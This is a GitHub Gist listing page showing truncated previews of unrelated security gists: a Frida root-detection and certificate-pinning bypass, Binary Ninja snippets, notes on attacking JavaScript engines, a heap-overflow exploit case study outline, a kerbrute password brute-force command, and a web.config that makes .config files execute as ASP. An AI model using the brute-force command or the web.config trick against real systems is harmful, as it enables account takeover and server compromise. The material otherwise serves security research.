This PoC has been moved to an actual repo here.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
setTimeout(function(){ | |
Java.perform(function (){ | |
console.log("[*] Script loaded") | |
var MenuActivity = Java.use("sg.vantagepoint.mstgkotlin.MenuActivity") | |
StartActivity.RootDetection.overload().implementation = function() { | |
console.log("[*] isDeviceRooted function invoked") | |
return false | |
} | |
console.log(""); | |
console.log("[.] Cert Pinning Bypass/Re-Pinning"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Welcome to Jordan's grab-bag of common Binary Ninja Snippets. | |
These snippest are meant to run with the Binary Ninja Snippets Plugin | |
(http://github.com/Vector35/snippets) though they can all also be pasted | |
directly into the python console or turned into stand-alone plugins if needed. | |
To install the entire collection at once, just install the Snippets plugin via | |
the plugin manager (CMD/CTL-SHIFT-M), confirm the Snippet Editor works | |
(Tool/Snippets/Snippet Editor), and unzip this bundle (Download ZIP above) into | |
your Snippets folder. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|=-----------------------------------------------------------------------=| | |
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=| | |
|=-----------------------------------------------------------------------=| | |
|=------------------------------=[ saelo ]=------------------------------=| | |
|=-----------------------------------------------------------------------=| | |
The following are some brief notes about the changes that have taken place | |
since the release of the "Attacking JavaScript Engines" paper [1]. In | |
general, no big conceptional changes have happened since. Mitigations have | |
been added to break some of the presented techniques and, as expected, a |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Heap Overflow Case Study: CVE-2015-3104 Proof of Concept | |
Heap Overflow Case Study: A Deeper Look at the Bug | |
Heap Overflow Case Study: Allocation Control. | |
Heap Overflow Case Study: Gaining Read/Write Access to the Memory Space | |
Heap Overflow Case Study: Defeating ASLR | |
Heap Overflow Case Study: Gaining code execution | |
Heap Overflow Case Study: Stack Pivoting | |
Heap Overflow Case Study: Defeating DEP | |
Executing Shellcode and Restoring the execution flow | |
Sandbox Escape |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Imports | |
from scapy.all import * | |
from pprint import pprint | |
import operator | |
# Parameters | |
interface = "eth0" # Interface you want to use | |
dns_source = "local-ip" # IP of that interface | |
dns_destination = ["ip1","ip2","ip3"] # List of DNS Server IPs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
ABOUT="piactl 0.10 | |
Copyright (c) 2018-2020 Peeter P. Mõtsküla <peeterpaul@motskula.net> | |
https://gist.github.com/ppmotskula/4288167460de27d22225e4959c44c6c4 | |
License: MIT License (https://opensource.org/licenses/MIT) | |
piactl helps you to install, configure and control CNIL's PIA software | |
(https://www.cnil.fr/en/open-source-pia-software-helps-carry-out-data-protection-impact-assesment) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<configuration> | |
<system.webServer> | |
<handlers accessPolicy="Read, Script, Write"> | |
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
</handlers> | |
<security> | |
<requestFiltering> | |
<fileExtensions> | |
<remove fileExtension=".config" /> |
Open the debugger VM's .vmx file. delete the existing serial0 lines (used for printing, not needed) add these lines:
serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"
NewerOlder